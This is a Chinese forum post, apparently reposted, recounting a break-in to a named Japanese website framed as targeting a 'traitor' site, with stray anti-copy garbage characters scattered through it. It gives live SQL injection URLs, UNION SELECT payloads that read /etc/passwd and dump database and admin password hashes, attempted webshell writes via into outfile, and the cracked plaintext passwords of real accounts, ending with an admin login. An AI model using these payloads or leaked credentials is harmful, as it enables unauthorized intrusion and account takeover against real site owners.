原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0x01. 检测 www.zuaa.jp 收集数据

: u/ g& q- n, H2 w6 y' x
whatweb
" B/ h$ k0 O# c5 C; ^6 F
1 [7 r' J. O, Y$ m2 V7 ?. ^, a
利用NMAP扫描
' O) U$ U, w2 s$ m) D6 ?8 E
$ K) R; b6 O5 T! }1 q, f. z中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
! ?8 @+ m) D, f4 @2 I/ j0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


0x03.order by
4 w0 U! S2 O) l9 l' Y# \8 Q9 V* {( w             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

1 M) [% p5 u$ Z! E; D  P) y$ korder by 28报错，order by 27正常
( X- y5 y# j0 h* n" b+ E( o
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
; \$ z; S7 A: y+ W( A0 n添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0x05. info:
2 y  n4 b, h+ ~6 f* \http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
( R8 ^' P* V8 s7 W4 U, B
user:            root@localhost
, y$ x5 y8 f$ Z& G3 }4 s) Kdatabase:    openpne
version:      4.1.22
os:             portbld-freebsd5.4

, M7 X7 z) c2 P5 a/ t. O! c0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
6 o" L8 t$ o  D0 a, d8 k! Shttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
7 P: I. f4 l# w& G7 H7 x, ?
8 Y0 @1 A, ?9 `: J& U1 ?  K通过工具转换

. l5 b4 Q( ?. R, f中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
! |  u4 j6 a! w7 q6 B$ `/ Q% _
+ u5 \7 H% q8 d9 y5 ]0x07. 利用 into outfile
全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

% E& p" r2 |6 b# J! e5 hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
: [! N  t/ X5 C, U) m
页面显示“MDB2 Error:syntax error”

3 a$ `, k8 z8 N. D0x08. 利用 mysql 4.1
. c" R" g8 W( H猜常规表名，字段未果 工具 sqlmap
5 E* L1 P0 r& y, A# Q中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持


9 f1 u+ h% _, ?+ W
0x09. 查找后台
利用 现有的各种 后台工具尝试都不行
2 |$ ]% ^# x- _
0x10.  MySL外联方法
+ Y2 @$ p0 p6 Z! T从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
" H6 ^+ N, r3 |( H. M' [http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

1 P; T9 ]3 }# H3 I' C这个可以在 www.cmd5.com 解密
( P: Z* R; t  Q$ h. P) A5 Lroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
6 n) j2 Z; L( t- e- f2 O5 p4 f- Nchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
* a- j6 g" r8 G# E7 M2 a! P' j% _% T8 Ropenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
) ^' V  x0 _/ k8 S; Izuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
0 t& {) L: W( E4 |" m9 w5 ?0 R
( p. {, M( [0 u- W% A
+ o) m8 M2 f" p8 |+ j0x11. 网站突破
& C$ h4 N" ^' n发现网站的源程序 openpne, google 下载 openpne 源码
1 X! \9 }2 z- ?2 |

0x12. 默认信息利用
http://sns.zuaa.jp/?m=admin&a=page_login

表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
0 C+ O- y3 d8 ^2 \2 g* w
解密
) Q( u/ o  e2 t- e; Q9 M$ P* xzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
3 K. V# X$ ~5 X4 t& S: W' i0 I3 t7 Ezuaajp:c0923ec5857796a393da99905008c176,          zju1897
- s: z' t+ R7 @: [$ T
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
4 ^6 R& x# o' u+ V
1 Q4 m  U" d; P- Y0x13. 登录后台

% v! `) y# Z' v% g4 R; G
+ T5 l# g. D& Y# n& Z% ]- Y
0x14. 小结
4 f, j7 ~* p" {# Q& O( F利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
% @& m$ ^% o, @感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
: p0 t  [$ U3 s$ K- W2 S------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的